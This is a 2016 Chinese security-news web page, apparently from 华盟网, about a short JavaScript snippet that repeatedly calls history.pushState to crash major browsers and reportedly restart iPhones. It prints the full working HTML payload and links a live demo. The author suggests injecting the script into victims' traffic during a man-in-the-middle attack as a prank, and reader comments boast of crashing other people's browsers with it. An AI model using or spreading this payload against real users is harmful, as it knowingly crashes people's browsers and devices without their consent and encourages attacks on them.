<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("代码,浏览器") PageTitle=stripHTML("这十二行代码是如何让浏览器爆炸的?") ArticleIntro=stripHTML("今天刷推特的时候发现Cyber Security@cyber__sec的推文让人眼前一亮:") Articlecontent=stripHTML("Crash firefox, chrome, safari browsers, and also restart iphone using this javas…") ModuleName = stripHTML("exploits") InfoID = stripHTML("223793") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> 这十二行代码是如何让浏览器爆炸的? - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> 最新漏洞 >> 其它漏洞 >> 正文

[图文]这十二行代码是如何让浏览器爆炸的?

2016/1/21 作者:0xroot 来源: 网络收集
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>
Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit
//使用下面这段JavaScript代码能让firefox,chrome,safari浏览器崩溃,而且还能让iphone重启。

 

  继续在推特上深挖发现IT Security Tweets ™ @F1r3h4nd 于17日发推:

Crash your friend's browser and restart Iphone with a link which has this script: #0day
//把带有下面这个脚本的链接发给你的朋友,能让你朋友的浏览器崩溃,而且让Iphone重启。

  

  完整HTML代码如下:

<html>
<body>
<script>
var total="";
for (var i=0;i<1000000;i++)
{
    total= total+i.toString();
    history.pushState(0,0,total);
}
</script>
</body>
</html>

  demo:(温馨提示:请保存浏览器其它窗口的编辑任务)

  www.0xroot.cn/demo.html  (点击一下,又不会怀孕!)

   接来下会发生什么?

   点开以后,我的状态是这样的:

  如果你是PC端用户,点开链接以后,电脑CPU内存极有可能一路狂飙直至浏览器崩溃卡死!

  如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。至于在推文中提到的让iPhone重启,这一现象倒是没有出现。22:49 修正:iPhone用Safari打开之后链接之后,手机注销重启了!…

  思考

  这是Bug还是0day?为什么会有这一现象?如何实现的?

  有哪些比较有意思的利用姿势?(我先来个:当在执行MITM中间人攻击的时候,可以注入这一段js,来个恶搞整蛊。然后都懂的…)

  欢迎大家在评论中发表自己的观点:)

  微博评论/讨论摘取

怀孕了...
好有趣...
好可怕...
整蛊不错
我已祸害了好多人(卖萌脸(づ ̄ 3 ̄)づ)
崩溃了
火狐假死10秒后弹窗提示脚本无响应可停止难道是history的栈溢出么?
可以可以,新姿势get√
JS是世界上最好的语言!
hist.pushState是干嘛用的?
电脑正在重启
不能只让我一个人中招
我为什么会手贱?
Chrome隐身模式没有问题啊


  • 上一篇漏洞:

  • 下一篇漏洞: 没有了